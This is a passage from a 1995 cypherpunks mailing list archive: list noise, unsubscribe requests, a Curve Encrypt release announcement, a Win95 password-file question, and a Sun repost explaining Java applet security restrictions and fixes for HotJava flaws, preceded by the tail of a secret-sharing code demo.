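        "mixed_ok": reconstruct(
            {1: period1[1], 2: period1[2], 3: period2[3]}) == secret,
        "shares_changed": all(period1[i] != period2[i] for i in period1),
    }


if __name__ == "__main__":
    print(demo())
```

The mixed-period reconstruction fails because the period 2 share carries an update term that the period 1 shares lack, which is why an attacker has to collect k shares within a single period.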




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 14 Nov 1995 05:36:40 +0800
To: cypherpunks@toad.com
Subject: Re: unsuscribe all news groups [NOISE]
Message-ID: <199511132103.QAA30498@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Someone wrote:

>
>I wish to unsuscribe to all news groups as I feel I should be on a different
>planet.

The planet of the clues.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKex/m1lp8bpvW01AQEvdAQAqjSV16hsO3mvGF71I1UkD9Ti/scw5slg
yd51BAttoIb7qDMox7W6ofBAaRW9YrJuD2hoU+/FGJMecEDgsjGnZgcPO2joh4AF
zJD4RU3a2VnEHzKRL+n9xQEtzn6Swo+rnDpRmJKtWso9jpUNXkasl9VTvVRzhf78
hweN2FR/nN4=
=4bJ9
-----END PGP SIGNATURE-----
Regards, Jim Ray

"...the politicians have been arguing over whether to increase the
   budget enormously or just hugely. The news media refer to this
   process as 'cutting' the budget." -- Dave Barry

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Tue, 14 Nov 1995 09:32:48 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Admissions Test [NOISE]
Message-ID: <199511140034.QAA05792@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Simply pick the BEST answer to EACH question.  Scoring information is
> provided at the end of the test.

[ Snip ]

> 14)  Blowfish is:
> 
> 	a)  Bruce Schneier's new Feistel network symmetric encryption
> 	    algorithm.
> 	b)  a possible replacement for DES.
> 	c)  something I ran into in the PGPfone docs.
> 	d)  a good way to get food poisoning at a sushi bar.

e)  Your favorite mail order catalog.  See http://www.blowfish.com/

Dana W. Albrecht
dwa@corsair.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 14 Nov 1995 06:47:52 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Hakim Bey mention of gvm't crypto policy
Message-ID: <Pine.SUN.3.91.951113164643.9263A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is a very brief excerpt from a Hakim Bey piece available at 
http://www.t0.or.at/hakimbey/boundary.htm, dealing with... well... lots 
of stuff, actually. Including stuff talked about on the list. I recommend 
the entire piece highly.

Jon

             --------------------------------------------

Knowledge itself can be seen as a kind of virus. On the psychological
level this perception manifested recently as a panic about "computer
viruses", and more generally about computer hacking -- boundary violations
in cyberspace, so to speak. The government wants access to all computer
cypher-codes in order to control the "Net", the InterNet, which might
otherwise spread everywhere, transmitting secrets, even secrets about
"abuse" and kiddy porn -- as if the Net were a disease, rather than simply
a free exchange of information. America's immune system can't take "too
much knowing" (or whatever T.S. Eliot's lame-ass phrase was); America must
be "protected" from penetration by foreign chaos cabals of evil hackers
(who might look just like you and me) -- borders must be imposed. 

            ----------------------------------------------

------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Rose <m.landicho@biology.bbk.ac.uk>
Date: Tue, 14 Nov 1995 01:57:35 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <ECS9511131718A@ccs.bbk.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peace@BIX.com
Date: Tue, 14 Nov 1995 09:23:38 +0800
To: cypherpunks@toad.com
Subject: Crypto requlations & laws
Message-ID: <9511131751.memo.29723@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Could the person posting the location of the crypto laws please repost.

Thanx ..tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Rose <m.landicho@biology.bbk.ac.uk>
Date: Tue, 14 Nov 1995 02:43:28 +0800
To: cypherpunks@toad.com
Subject: unsuscribe all news groups
Message-ID: <ECS9511131814A@ccs.bbk.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I wish to unsuscribe to all news groups as I feel I should be on a different planet.  
Could somebody notify all newsgroups on my behalf please.

Sincerely yours








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 14 Nov 1995 19:20:18 +0800
To: cypherpunks@toad.com
Subject: Java security (reposted from RISKS)
Message-ID: <v01530507accdb2e28a83@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------

Date: Fri, 10 Nov 1995 15:45:00 -0800
From: Marianne.Mueller@eng.sun.com (Marianne Mueller)
Subject: regarding Java security

This response was recently posted to comp.lang.java.
Marianne Mueller <mrm@eng.sun.com>, Java Products Group, Sun Microsystems, Inc.

Article 4356 of comp.lang.java:
Path: handler.Eng.Sun.COM!puffin.Eng.Sun.COM!mrm
From: mrm@puffin.Eng.Sun.COM (Marianne Mueller)
Newsgroups: comp.lang.java
Subject: Re: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Date: 9 Nov 1995 00:50:27 GMT
Organization: Sun Microsystems, Inc.  Mt. View, Ca.
Keywords: alpha3 hotjava security

The paper written by the two students at Princeton describes possible
attacks on the alpha3 HotJava browser, which have all been fixed in JDK
beta.  Granted, until this week, the source code for JDK beta wasn't
available, so it's understandable that they analyzed the alpha3 source base.

We understand people need more information on the security model, and we're
taking time right now to document the security story more rigorously.  A
security FAQ, an updated whitepaper, detailed user documentation and
detailed implementor's documentation are all being worked on.

The Java security mechanisms include:

        Java language mechanisms

          * no pointers
          * private interfaces, classes and methods
          * class loader that enforces namespace divisions
          * runtime byte code verifier that enforces language
            type rules and name space divisions

        Browser mechanisms, used by JDK beta appletviewer and by
        Netscape Navigator 2.0beta

          * AppletSecurity: extends java.lang.SecurityManager; strict
            applet checks
          * AppletClassLoader: extends java.lang.ClassLoader; strict
            class loading

The goal for JDK beta is to enable browsers to run untrusted applets
in a trusted environment.  The approach is to be conservative at
first, and to add functionality when it can be added securely.

So, JDK beta applets (and Netscape 2.0beta applets) may not do the
following.

  1.  Files:

        Access Control Lists are greatly restricted in beta,
        as compared to the situation in the alpha3 HotJava browser.
        ACLs are initialized - only once - by the applet security
        manager, and are not user configurable.

        For a file not on the access control list, an applet cannot

        - check for the existence of the file
        - read the file
        - write the file
        - check the file type
        - check if the file is a directory
        - check the timestamp when the file was last modified
        - check the file's size
        - create a directory
        - rename the file
        - list the files in this file (as if it were a directory)

        Applets cannot

        - create a FileInputStream
        - create a RandomAccessFile, either for reading or writing
        - Open file descriptors

  2.  Sockets:

        Applets cannot

        - Create socket connections other than to its own host
        - Create a socket factory

  3.  Loading/linking:

        Applets cannot

        - Create class loaders
        - Access a package in the sun.* hierarchy
        - Define a new class in the java.* hierarchy
        - Link dynamic libraries using System.loadLibrary()
        - Disable or override the AppletSecurityManager

  4.  Process control:

        Applets cannot

        - Define native methods
        - Fork processes
        - Manipulate threads or thread groups outside of the
          applet's thread group
        - Exit the virtual machine (e.g., the browser or the appletviewer)

  5.  awt:

        Applets cannot

        - Create toplevel windows that don't have a warning banner

Applets can use network connections only to connect to the host they
originate from, to download files that are part of the applet's
implementation.  Those files might be java bytecode class files, or they
might be input files used by the applet (GIF, JPEG, audio, other data
files.)

Taking a look at the specific attacks mentioned in the paper -

        alpha3 HotJava                  JDK
        ----------------------          ---

1.      socket accept() and             applets cannot use
        listen() aren't protected       accept() and listen()
        adequately, allowing a
        browser to eavesdrop

2.      applets can connect to          applets cannot connect
        the SMTP (mail) port on         to the SMTP port on
        some web server and use         the computer the applet
        that as a covert channel        is visiting

3.      InetAddress.getByName()         applets cannot use
        is public and does not          InetAddress to inquire
        check the security mode         about hosts they are
        before making DNS request       not already allowed to
                                        connect to

4.      applets can use DNS to          applets may not get the
        create a covert channel         internet address of any
                                        host

5.      Access Control Lists (ACLs)     ACLs are greatly restricted
        for reading and writing         in JDK beta.
        files are not strict enough     Reading/writing files is
                                        disabled for web browsers,
                                        such as Netscape Navigator 2.0.

6.      applets can use the             System.getenv() is obsolete
        System.getenv() method          and is not part of the JDK
        to gather information about     API
        the computer that it is
        running on

7.      applets can change the          applets cannot read or alter
        property manager database       client properties

8.      applets can change the          The fields that hold the
        HTTP and FTP proxy server       HTTP and FTP proxy names are
                                        private.  The values are stored
                                        in a property manager database
                                        that an applet cannot read or
                                        write.

It's very difficult, if not impossible, for a web browser to completely
prevent denial of service attacks.  The JDK applet API doesn't claim to
prevent denial of service attacks.  A "denial of service" attack is where
someone writes an applet whose goal is to consume all available resources on
your computer, forcing you to kill the browser you're running.  For example,
someone could write an applet that creates a million pop-up windows.  The
windows don't do anything, but creating a million of them might use up all
the virtual memory on your computer and you'd have to kill the web browser
to reclaim the virtual memory.

Before people engage in too much wailing and gnashing of teeth about
how applets have been too severely restricted -

We want to enable applets to do interesting things, including making
socket connections, and reading and writing to the file system.  One
way to enable that is to use a signed class loader.  When a trusted
applet is loaded, then the applet could be granted permission to do
some of the things they are prevented from doing by default.

The goal is to ensure that untrusted applets can't steal or damage
information on a computer running a Java-enabled browser.  Later, we can
allow trusted applets to do things that untrusted applets are not allowed to
do.  Since an implementation bug in a trusted applet could open a loophole
that could be exploited by an untrusted applet, design matters.

Marianne  Java Products Group  http://java.sun.com/people/mrm/

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 Nov 1995 12:34:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511140403.UAA10207@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


ON SAT, 11 NOV 1995, ANOTHER TENTACLE WROTE:

> >  JEFF, I THINK IT'S IN YOUR BEST INTEREST TO NOT WASTE YOUR TIME
> >RESPONDING TO THIS MORON (WHO BEARS MANY FEATURES IN COMMON WITH
> >DETWEILER)
> 
> EXCEPT FOR HIS ESTEEMED "CREDENTIALS", OF COURSE...

CREDENTIALS??!!??  WHAT CREDENTIALS??  'YOU WANNA HEAR, SOME STINKING
CREEEDENTIALS, BEFORE YOU SMELL THAT SOMETHING IS ROTTEN IN DENMARK,
EH?  

RIGHT UNDER YOUR NOSE ... AND IT AIN'T NO LIMBURGER.

YOU DON'T NEED NO CREDENTIALS TO DO THAT.  THE STENCH IS PRETTY
OVERWHELMING.  IT'S MORE THAN A LITTLE RIPE ...

DO YOU WANT TO HEAR HOW I USED TO BOOK LARGE BLOCKS OF TIME ON THE
TRS-80 IN THE HIGH SCHOOL PHYSICS LAB, WHILE DEBATING QUANTUM PHYSICS
WITH MY OLD FRIEND, TREV, THE GUY WHO BECAME A RHODES SCHOLAR??

WOULD THESE CREDENTIALS HELP YOU SMELL A RAT??

MAYBE YOU WANT TO HEAR ABOUT HOW I OUTGREW RACK SHACK WHILE IN HIGH
SCHOOL AND MOVED FORWARD TO PLAYING ADVENTURE ON THE CHEMICAL
ENGINEERING VAX, READING NEWS ON THE DECWRITER, ASKING ALIZA FOR
ADVICE, AND DISCOVERING MULTICS, ALL WHILE IGNORING MY HIGH SCHOOL
STUDIES.

ARE ANY OF THESE CREDENTIALS GONNA MAKE YOU BELIEVE??

IT'S ALL JUST ANCIENT HISTORY.  PAST PERFORMANCE.  YOU CAN'T RELY
ON IT, OR DEMAND CREDENTIALS IF YOU WANT ORIGINALITY AND CREATIVITY.

PAST PERFORMANCE MEANS NOTHING.  IT'S NOT AN INDICATOR OF FUTURE
PERFORMANCE.  (BUT, DECWRITERS WERE A CRACKER'S DREAM WITH THEIR
PASSWORD OVERSTRIKE ...  HE ... HE ... HE ...  ESPECIALLY WHEN PEOPLE
CONNECTED A DECWRITER TO MULTICS.  WON'T TALK ABOUT BRINGING DEVELNET
DOWN, WITH A SINGLE CTRL-G, EITHER.)

IS THIS WHATCHYA WANT??  OR DO YOU WANT TO HEAR ABOUT HOW I WAS
"RECRUITED"??  OF WHAT BROUGHT ME HERE, RECENTLY.  THAT'S A LONG
STORY.  ONE WHERE I HAVE TO EXPLAIN WHY THE LOCAL HOMETOWN CHIEF OF
POLICE RESIGNED WITHOUT A REPLACEMENT.  AND OF THE VOTE OF NON
CONFIDENCE IN THE DEPARTMENT BY THE COMMISSION, AND OF CRIME-STOPPERS
AND THEIR SUPPOSED ANONYMITY AND OF A MURDER INVESTIGATION GONE
SIDEWAYS AND WHY WE NOW HAVE A BRAND SPANKING NEW CHIEF OF POLICE.

A REAL CUTEY, TOO!!  MIGHT EVEN EXPLAIN WHY THE PARTY LINE.

MAYBE YOU WANT TO HEAR ABOUT SOME OF THE NAUGHTY, NAUGHTY RESEARCH
THAT WAS HAPPENING WAAAAY, WAAAY BACK WHEN ...  LIKE MAYBE, A COUPLE
OF RECOMBINANT DNA EXPERIMENTS I WAS ASSISTING WITH WHEN I WAS FIFTEEN
... MAYBE EVEN THE EXPERIMENTS THAT LED TO AN UNSCHEDULED RELEASE OF
BIO-ACTIVE MATERIAL??

OOPS ... E. COLI, EH?

NAAAH, WE'LL ALL SHADDUP 'BOUT ALL THAT.  BUT I WONDER WHAT THAT
MULTICS WAS DOING IN SOME FOREIGN COUNTRY.  YOU'D HAVE THOUGHT THAT
ITAR OR SOMESUCH WOULD HAVE PREVENTED THE EXPORT TO A BUNCHA
FOREIGNERS, NO??

NO.

WE'RE CANADIEN, EH??  WE'RE JUST LIKE YANKEES, CEPT WE WEAR TOQUES AND
PLAY HOCKEY ... AND WE'LL JUST ROLL OVER AND CEDE OURSELVES TO
THAT SOUTHERN ELEPHANT THAT WE LIVE RIGHT NEXT DOOR TO.

PHOOEY.

MAYBE YOU WANT TO HEAR ABOUT WHAT HAPPENED AFTER I MOVED FROM THE
DANGEROUS BIOLOGICAL AND PHYSICAL SCIENCES TO SOMETHING BENIGN, LIKE
COMPUTERS AND NETWORKS.  WHAT HAPPENED AFTER THE NON-SCHEDULED RELEASE
OF BIO-ACTIVE MATERIAL, OF HOW I INITIALLY GOT INTRO'D.

MAYBE THAT'LL HELP YOU SMELL THE SMOKE??

OK ... IF IT'LL HELP, I'LL TELL YOU STUFF 'BOUT ME, SO YOU CAN JUDGE
MY "SO CALLED" CREDENTIALS ...

FROM AGE FIFTEEN, AFTER THE UNSCHEDULED RELEASE, I WAS "MENTORED" BY
ONE OF THE TOP SECURITY EXPERTS, ONE OF THE BEST OF THE FIELD, A MAN
WHO I STILL HAVE THE UTMOST RESPECT FOR AND SOMEONE WHO I AM
UNFORTUNATELY NOT ANY LONGER IN CONTACT WITH.  SOMEONE WHO IN SOME
WEIRD AND WARPED WAY IS ACTUALLY RESPONSIBLE FOR MAKING IT ALL HAPPEN.
(BUT THEN AGAIN, HE WENT TO THE BRONX SCHOOL OF SCIENCE ... I THINK)
AND THAT EXPLAINS NOTHING AND EVERYTHING AT THE SAME TIME.

(HE'S PRETTY BALD NOW, TOO ... GUESS I DIDN'T JUST MAKE HIS HAIR GREY,
HE PROBABLY ENDED UP TEARING MOST OF IT OUT BY THE HANDFUL.)

OOPS, I SHOULDN'T HAVE SAID THAT ...

ANY MORE CLUES??

HMMM, HOW ABOUT WHAT HAPPENED AFTER DROPPING OUT OF HIGH SCHOOL WHEN I
WAS SEVENTEEN AND LEAVING THE VAX AND MULTICS AND PUNCHED CARDS BEHIND
AND GOING TO WORK ON THE FIRST NCR IMPLEMENTATION OF DEBIT CARDS AND
THE CREATION OF THE FIRST ATM NETWORK.

WOULD THAT HELP??  IMPLEMENTATION OF AN OFFLINE NON-NETWORKED ATM 
NETWORK?  I MEAN, IT'S NOT LIKE A CASH REGISTER COMPANY MIGHT HAVE 
WORKED ON E-CASH BACK IN THE LATE SEVENTIES AND EARLY EIGHTIES, 
OR SOMETHING.

OOPS, MORE CLUES ... GOTTA STOP POSTING THOSE CLUES ... 

(IF I KEEPA POSTING CLUES, THEY MIGHT FIGURE OUT THAT ALL PUBLIC
INFORMATION IS INHERENTLY DISINFORMATION, OR SOMETHING LIKE THAT.)

OK ... HOW 'BOUT THIS ... HOW ABOUT WHEN I TRIED TO RUN FOR THE DOORS
WHEN THE PROJECT ABANDONED NCR FOR THE ATM NETWORK AND EXPECTED MOI
TO LEARN CICS AND JCL. 

HEE-BEE JEE-BEES ... JCL ... <SHUDDER>

IT'S ENOUGH FOR ANYONE TO RUN FOR THE DOORS.  LEFT MY OWN PERSONAL
LITTLE MINI AT MY DESK, MY OWN LITTLE FIEFDOM, IN THE CAPABLE HANDS OF
A COUPLE OF TECHIES AND LEFT THE BIG BLUE CONVERSION IN THE
SEMI-CAPABLE HANDS OF SOME ASSOCIATES FROM DMR (I THINK), AND GOT THE
HECK OUTTA THE FIELD.

SORTA ... KINDA ...

IS THIS GONNA MAKE YOU BELIEVE THAT THE VODKA IS FLOWING, BUT THE MEAT
IS ROTTEN??  PROBABLY NOT.

IS IT GONNA MAKE YOU STOP HOLDING YOUR NOSE??  COLOUR ME, DOUBTFUL. 

LET'S JUST SAY THAT I TIRED OF THE NONSENSE AND TOOK A BREATHER.

MAYBE IT WAS THAT FATEFUL DAY WHEN MANAGEMENT QUESTIONED WHY I HADN'T
SHAVED FOR THE MORNING MANAGEMENT BRIEFING -- THE MORNING MEETING WITH
THE DOUGHNUTS, BRIGHT AND EARLY AT EIGHT.  

I HAD THE TEMERITY TO APPEAR HALF-SHAVEN AND HALF-BAKED AFTER
HANDHOLDING THE NETWORK THROUGHOUT THE NIGHT, THE DAY, AND ANOTHER
NIGHT.  I WAS SPACED AND MESSY.

BUT IT WAS A DEFINING MOMENT.  

WHILE THOSE CAFETERIA BENCHES MADE GREAT BEDS IN A PINCH, AND WHILE
YOU COULD ALWAYS SPONGE BATH IN THE EXECUTIVE BATHROOM.  IT GOT TO BE
OVERWHELMING AFTER A COUPLE OF DAYS AT THE OFFICE.

AND IT WAS MY MISTAKE.  MY OVERSIGHT.  MAKE NO DOUBT ABOUT THAT.

I SUPPOSE MANAGEMENT WAS RIGHT, NO OFFICE EMPLOYEE SHOULD EVER STUMBLE
UPON CRO-MAGNON MAN STANDING NUDE IN THE JOHN.  NO ONE REASONABLY
EXPECTS TO BE CONFRONTED BY DONKEY KONG.  ESPECIALLY DURING
STANDARD:DAYLIGHT TIME CONVERSION WHEN MR ROCKET SCIENTIST FORGETS TO
CHANGE A WRISTWATCH AND BARES ALL, THINKING THAT EIGHT IS SEVEN, AND
IS SURPRISED!!

OOPS ... 

IS IT REALLY GONNA HELP MY CREDENTIALS ANY, IF I TALK ABOUT BEING
CAUGHT WITH MY PANTS DOWN??  OR EXPLAINING WHY I HADN'T SHAVED FOR THE
MORNING BRIEFING??  OR DE-BRIEFING, AS THE CASE MAY BE.

LET'S JUST SAY THAT I LEFT THE FIELD ...

OR ... MAYBE ... MAYBE ... SOME QUICK DAMAGE CONTROL ... MAYBE, WE HAD
DIFFERING VISIONS OF SYSTEMS -- MANAGEMENT AND I -- YEAH THAT'S THE
TICKET -- MAYBE I "ACCIDENTALLY" LEANED AGAINST THE WALL AFTER
MANAGEMENT IMPLEMENTED THEIR OWN DRESS POLICY ... I MEAN HOW DANGEROUS
COULD AN IMPLEMENTED DRESS POLICY BE??

"IT'S ONLY A DRESS POLICY," THEY SAID.

I SUPPOSE THE SUGGESTION THAT TROUSERS *MUST* BE WORN AT ALL TIMES WAS
REASONABLE ... AND IN HINDSIGHT ... I SUPPOSE I SHOULDN'T HAVE
"ACCIDENTALLY" DUMPED THE HALON WHEN THEY SUGGESTED THAT BOW-TIES WERE
NOT APPROPRIATE CORPORATE ATTIRE AT A FINANCIAL INSTITUTION -- THAT
THEY *SHOULDN'T* BE WORN.  THAT WAS ALL OK.  I THINK WHAT FINALLY MADE
ME SNAP WAS WHEN THEY SUGGESTED THAT I ... AND EVERYONE ELSE ...
SHOULD NOT ONLY *ALWAYS* WEAR TROUSERS AND *NEVER* BOW-TIES, BUT THAT
WE *MUST* WEAR A "NORMAL" TIE AT ALL TIMES AND BE A GOOD LIL BIO-UNIT.

MAYBE IT WAS THE DIRECT ORDERS TO WEAR ONE OF THOSE FLOPPY DANGLY
THINGS AROUND MY NECK WHEN I WAS AROUND THE LINE PRINTERS ... BEING
ORDERED TO WEAR IT THAT DID IT.  OR MAYBE, IT WAS SOMETHING ELSE
ALTOGETHER DIFFERENT.

WHO KNOWS??  

BUT THE BOTTOM LINE WAS THAT I WAS OFF TO JOIN THE WONDERFUL WORLD OF
FINANCE AND MANAGEMENT.  THE NOOSE HAD WON, I *WOULD* WEAR IT, AND I
COULD KEEP MY PANTS -- AT ALL TIMES -- WHERE THEY TRULY BELONGED.

ARE THESE THE CREDENTIALS, THAT YOU'RE AFTER??

THE ONES THAT WILL MAKE THE WORLD STOP SPINNING, AND SLOW DOWN AND
LISTEN ... WHEN SOMEONE SCREAMS FIRE IN A CROWDED THEATRE?  AND ASKS
THAT THE NETWORK BE TAKEN DOWN FOR SECURITY REASONS?  OR, 
ALTERNATELY THAT A PARTICULAR INSTALLED CODE BASE BE REMOVED, BECAUSE 
IT IS EVIL INCARNATE??

PROBABLY NOT ... IT DOESN'T ADD ANYTHING TO MY PROFILE AT ALL. 

MAYBE, WHAT MIGHT HELP IS SOMETHING MORE SIMPLE.  AFTER LEAVING THE
BIO-SCIENCES FOR SOMETHING SAFER, AND THEN THE COMPUTER SCIENCES, AND
THEN ULTIMATELY LEAVING FINANCE AND MANAGEMENT.  WHAT WAS LEFT FOR A
BIOUNIT TO DO.

BUT THAT WOULD LEAD TO THE STORY OF HOW -- THANKS TO SOME POLISH
MATHEMATICIAN -- I DRIFTED OVER INTO PURE MATHEMATICS AFTER BECOMING A
SEMI-RETIRED SLUMLORD IN MY EARLY TWENTIES, AND AN OCCASIONAL
CONSULTANT AND FINANCIAL ANALYST WHO HELPED PEOPLE SWAP AND DERIVE
THINGS.  A SYSTEMS-DECONSTRUCTIONIST.

RACONTEUR, BON-VIVANT, AND A RENAISSANCE MAN ARE SOME OF THE LABELS
HURLED MY WAY IN SCURRILOUS ATTACKS.  FIGHTING WORDS.

AND NOW??  WELL LET'S JUST SAY THAT PURE MATH IS A GREAT HOBBY FOR 
ONE OF THOSE GOSH-DARNED INDEPENDENTS.

SURE BEATS STAMP COLLECTING OR COMIC BOOKS.  

EXCEPT FOR THAT SCOTT ADAMS GUY ... HE'S A RUSH ... THIS MORNING'S 
DILBERT WAS A REAL H00T ... TEN-DOLLAR BONUS FOR BUG-FREE SOFTWARE 
... *POSH* ... I MEAN WHERE DOES THIS SCOTT GUY GET HIS MATERIAL??  

YAHOO!!  AND YIPPEE KI YAY!!  I FINALLY FIGURED IT OUT.

ALICE IS ACTUALLY SCOTT ADAMS.  SOMEONE FINALLY "BROKE THE CODE".
THE CODE:  A CHICKEN IN EVERY POT AND A MINI-VAN IN EVERY DRIVEWAY!!!
(GUESS YOU HAD TO BE THERE ... OR YOU HAD TO READ THIS MORNING'S FUNNY.)


                ---  LOVE YA ... MEAN IT ... ---


MALICE DE 'MONSTEROUS

                                  ...JUST ANOTHER ONE OF THOSE...
                                                ...TENTACLES...

P.S.  THIS POST IS IN THE PUBLIC DOMAIN.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
Date: Tue, 14 Nov 1995 20:58:51 +0800
To: lestat@richmond.infi.net (Terry Harrison)
Subject: Re: Password File Utility Wanted [Win95, ha ha]
In-Reply-To: <48888p$970@news.infi.net>
Message-ID: <199511140428.UAA03630@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
comp.os.ms-windows.win95.misc, alt.security,comp.security.misc)

-----BEGIN PGP SIGNED MESSAGE-----

In article <48888p$970@news.infi.net>, lestat@richmond.infi.net
(Terry Harrison) wrote:

>I would like to obtain a program to address the following.....
>
>I use the 'remember password' option on my network logins, and then
>when they expire, I don't remember what they were.  This is bad as I
>need them to change the old password (particularly a problem with
>Netware).  What I would like is a utility that would prompt me for my
>current windows ID for security, then decode the .pwl files so that I
>could read my old passwords.  Ideally, it would allow an edit of the
>existing passwords as well.  Anybody seen onea these??

Such a thing could exist, because Win95 allows you to save passwords that
use different encryption methods. Microsoft would say "no, doesn't exist,"
however, because this is a major security flaw. I haven't seen such a
tool, though. Anybody?

What you should do is get a real encryption package like PGP (poke
around on http://web.mit.edu/ or http://www.netresponse.com/zldf/, it's
free), use something that is long and complicated but that you will never
ever forget as your PGP passphrase, and encrypt a text file containing
all of your passwords with PGP. You can put other stuff like all your
credit card numbers in a PGP-encrypted file with reasonable safety too.
You (only) will be able to decrypt and read this file whenever you want.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKgam43DXUbM57SdAQE9eQP/YY/Sv9izIoSg9gnOZUM+WQSZfkv/YDi4
oCzFerVMDFZT+7kD+w206qGjrtWUDQ3Rwie5XqlaLG3Ezhh9tpldMMPdy50K8dwI
WL43SQeplXDxAESUC3Td7j2MRK5ONacfojSaSoauHW6Ffr+M2sU5opJlB+y88eTv
45VCTDn8J1I=
=Qbqx
-----END PGP SIGNATURE-----
-- 
rich graves, llurch@networking.stanford.edu
moderator of the win95netbugs list
http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Tue, 14 Nov 1995 12:05:38 +0800
To: mcip@DeepEddy.com
Subject: ANNOUNCE: Curve Encrypt 2.2
Message-ID: <199511140336.UAA17922@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Curve Encrypt version 2.2 is now available.

Curve Encrypt is a program for encrypting files on a Macintosh so that they 
cannot be read without a pass phrase. It works on files, folders or whole 
volumes, and supports the IDEA and triple-DES encryption algorithms. CE also 
supports Aladdin's StuffIt Engine for data compression. Full source code is 
provided. System 7 only.


NEW FOR 2.2

The following changes have been made for the 2.2 release:

* When wiping free space on a volume, Curve Encrypt 2.2 now also wipes unused 
space in allocated blocks.

* Curve Encrypt 2.2 comes with both PowerPC native and 68K versions.


FTP SITES

Curve Encrypt is available with source at the following FTP sites:

ftp://ripem.msu.edu/pub/crypt/mac/
This is an export controlled ftp site: read /pub/crypt/GETTING_ACCESS for
information on access.

ftp://ftp.csn.org:/mpj/I_will_not_export/crypto_???????/
ftp.csn.org is also export-controlled: read /mpj/README for the characters 
to replace ???????.

ftp://miyako.dorm.duke.edu/pub/noexport_?????/miyako/mac/strong/
Read the file /pub/GETTING_ACCESS for the characters to replace ?????.


ADDRESS FOR SUPPORT

Curve Encrypt (c)1994-1995, Curve Software. 

Please send email to kinney@colorado.edu. Bug reports, suggestions, praise, 
flames, whatever are all welcome. Curve Encrypt is provided free of charge. 
If you like the program, give it to a friend or two. If you like the source 
code, lift it and make something new with it. 

License is granted under the copyright for distribution within the United 
States only. Export of this software may violate United States export law. 
Support will not be provided for non-U.S. addresses or anon id's. Sorry about 
that.


The Curve Software PGP public key is:


All official releases will be validated by a signature from this key.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNhKMJkEfxTVMrJAQF1HgQAophyo7VlpIS9pzkpj2kPk5HkBoWffttc
4YJqcJMGUc8ZSIe1vJqXjnljdyk7/MV9O/nXK/mLh3sqdf5pV2tSJzbQHImoq6mL
HyHhP6bL4hZPZJaEIXWQRK6meiUJDy0wzKOqRFAZcJk4ojulfa31lTujg6Ckh3/J
C+GNG0lp1fg=
=YNK6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 14 Nov 1995 03:24:53 +0800
To: Mary Rose <m.landicho@biology.bbk.ac.uk>
Subject: Re: unsuscribe all news groups
Message-ID: <199511131855.UAA00152@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> I wish to unsuscribe to all news groups as I feel I should be on a different
> planet.
> Could somebody notify all newsgroups on my behalf please.
> 
> Sincerely yours

Please send a one line message containing only

HELP

to majordomo@toad.com to get help on doing this.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
